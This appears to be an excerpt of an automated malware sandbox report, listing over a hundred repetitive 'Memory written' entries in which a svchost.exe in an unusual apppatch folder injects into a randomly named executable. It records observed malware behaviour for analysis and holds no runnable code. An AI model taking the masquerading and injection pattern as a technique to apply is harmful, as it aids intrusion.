Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F11000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F12000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F62000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2B50000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2B51000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2B52000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2BA2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 12D0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 12D1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 12D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1322000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2F90000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2F91000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2F92000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2FE2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 780000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 781000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 782000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 7D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: CA0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: CA1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: CA2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: CF2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2980000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2981000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2982000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 29D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2410000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2411000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2412000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2462000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1030000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1031000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1032000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1082000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 870000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 871000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 872000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 8C2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E60000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E61000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E62000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: EB2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1010000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1011000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1012000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1062000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E70000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E71000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E72000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: EC2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E80000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E81000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E82000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: ED2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1040000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1041000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1042000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1092000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E40000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E41000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E42000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E92000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2530000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2531000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2532000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2582000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 840000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 841000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 842000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 892000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1220000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1221000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1222000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1272000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: AA0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: AA1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: AA2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: AF2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 11F0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 11F1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 11F2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1242000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1300000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1301000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1302000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1352000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F10000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F11000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F12000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F62000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 810000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 811000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 812000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 862000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1300000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1301000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1302000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1352000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 850000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 851000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 852000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 8A2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1010000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1011000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1012000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 1062000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F10000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F11000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F12000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F62000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: E10000Jump to behavior
